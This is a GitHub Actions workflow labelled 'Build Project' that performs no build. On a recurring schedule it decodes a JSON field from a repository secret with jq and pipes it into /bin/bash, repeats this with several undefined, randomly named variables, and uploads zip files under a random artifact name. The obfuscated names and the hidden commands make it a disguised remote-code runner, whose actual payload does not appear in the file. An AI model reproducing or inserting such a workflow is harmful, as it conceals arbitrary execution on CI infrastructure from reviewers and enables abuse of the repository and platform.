name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '29 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          aua1472: ${{ secrets.aua1472 }}
        run: |
          printf '%s' "$aua1472" | jq -r .cz6 | /bin/bash
          echo $yxr77 | jq -r .eqqmm6 | /bin/bash
          echo $n95 | jq -r .sbcid472 | /bin/bash
          echo $rj06 | jq -r .zjyd181 | /bin/bash
          echo $y84 | jq -r .rbvy26844 | /bin/bash
          echo $ibjpg011 | jq -r .ze911 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: p8yfUjJh
          path: "*.zip"
          retention-days: 1
